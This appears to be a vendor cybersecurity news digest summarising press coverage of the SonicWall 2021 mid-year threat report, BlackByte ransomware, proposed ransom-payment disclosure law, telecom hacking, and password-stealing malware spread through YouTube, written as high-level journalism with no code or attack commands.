Accounting Web (U.S.): Using SonicWall’s Mid-Year Update on the 2021 Cyber Threat Report, the author illustrates the sharp rise in cybersecurity attacks. The article is mostly about how CPAs and other accounting professionals play a crucial role in protecting financial data. However, the author also provides an overview of the most common cyberattacks, such as malware and phishing, and offers tips on making sure your organization has the proper protections in place.

‘Clumsy’ BlackByte Malware Reuses Crypto Keys, Worms into Networks

Dark Reading (U.S.): A unique malware named “BlackByte” was discovered during a recent incident response engagement. The malware reportedly avoids Russian computers and uses a single symmetric key for encrypting every compromised system. Additionally, the report cites SonicWall’s “Cyber Threat Report: Mid-Year Update” and notes that the number of ransomware attacks in the first half of the year rose 150% to almost 305 million.

The Ransom Disclosure Act Proposed — Gives 48 Hours to Report Ransom Payments

LinkedIn Pulse: Citing Ransom Disclosure Act legislation proposed in the U.S. Senate, the author offers “hard-numbers perspective” of data from the Mid-Year Update on the 2021 SonicWall Cyber Threat Report, ransomware attacks surged a staggering 304.7 million attempted ransomware attacks within SonicWall Capture Labs’ Capture Threat Network, which monitors and collects information from global devices.

Industry News

DHS Secretary: “Killware” Malware Designed to Do Real-World Harm

CPO Magazine: This article opens with comments made by U.S. Department of Homeland Security Alejandro Mayorkas where he asserts that “killware is poised to be world’s next breakout cybersecurity threat.” The reference is on recent attacks on water treatment plants and hospitals where hackers could – in theory – trigger events that may harm or kill people. Mayorkas’ claim appears to be backed up by research from Gartner that projects that threat actors will be weaponizing operational environments to harm and kill people within the next four years. While the danger is real, other analysts believe that the “hype is bigger than the threat, for now.” While the attacks on SolarWinds and the Colonial Pipeline are very worrisome, and the recent attempted attack on a water treatment plant in Florida is alarming to the extreme, they are not necessarily harbingers of imminent danger. Since nearly all cybercrime is motivated by profit, we need to define… “exactly when a given cyberattack moves from being a purely criminal matter to a national security threat,” said one analyst. “If cyberattacks, especially those perpetrated across international boundaries, regularly cause bodily harm or loss of life, they will receive treatment as a threat to national security.”

Cybercrime Group Hacking Telecoms to Steal Phone Records

Gizmodo: A new report shows that a particular hacker group, believed to be based in China, has been targeting telecommunication companies all over the world. The report, which goes into a significant amount of detail, shows that the hackers behind the campaign have managed to infiltrate 13 different global telecoms in the span of just two years. Reuters reports that this has included exfiltrating “calling records and text messages” directly from carriers.

Hosting Administrators Sentenced for Helping Cybercrime Gangs

Bleeping Computer: Two Eastern European men were sentenced to prison on Racketeer Influenced Corrupt Organization (RICO) charges for bulletproof hosting services used by multiple cybercrime operations to target U.S. organizations. They provided cybercrime-affiliated clients with the infrastructure needed to host exploit kits and run malicious campaigns distributing spam emails and malware for roughly seven years, between 2008 and 2015.

The Dark Web Goes Darker and Busier

TechSpot News: Cybercrime services cost less than $500, and stolen data now spreads 11 times faster than it did six years ago, according to a recent study by BitGlass. Why this matters: The dark web is not only alive and kicking, and it’s growing more dangerous than ever.

Cybersecurity Offers Jobs, High Wages — If Enough People Can Be Trained

Argus Leader: As people consider careers or new options in work, high-paying jobs in traditional fields like health may come to mind, but one industry is prospering from protecting the data of others. Cybersecurity, the protection of computer systems and networks, is emerging as a promising industry with more than enough jobs. The issue? There aren’t enough faculty to train people to fill that work.

Macs Still Targeted Mostly with Adware, Less with Malware

Dark Reading: For people who rely on Macs, the news is a little better. An ongoing study of vulnerabilities, the top 10 categories of digital threats on macOS are all adware programs, with only a sliver of the share of victims affected by actual malware. Apple Macs are not immune to malicious attacks. Still, outside of some significant nation-state efforts, new research shows that bad actors continue to use adware as the method of choice to make money from infecting the macOS operating system.

Massive Campaign Uses YouTube to Push Password-Stealing Malware

Tech Times: Widespread malware campaigns are creating YouTube videos to distribute password-stealing trojans to unsuspecting viewers. Initially reported by Bleeping Computer, video descriptions may contain links that lead to password-stealing trojan malware. These infections quietly run on a computer while stealing passwords, screenshots of active windows, cookies, credit cards stored in browsers, FTP credentials, and arbitrary files decided by the threat actors. When installed, the malware will communicate with a Command & Control server, where it waits for commands to execute by the attacker, which could entail the running of additional malware. According to this report, the best way to avoid the attack is not to click links in the video description.

In Case You Missed It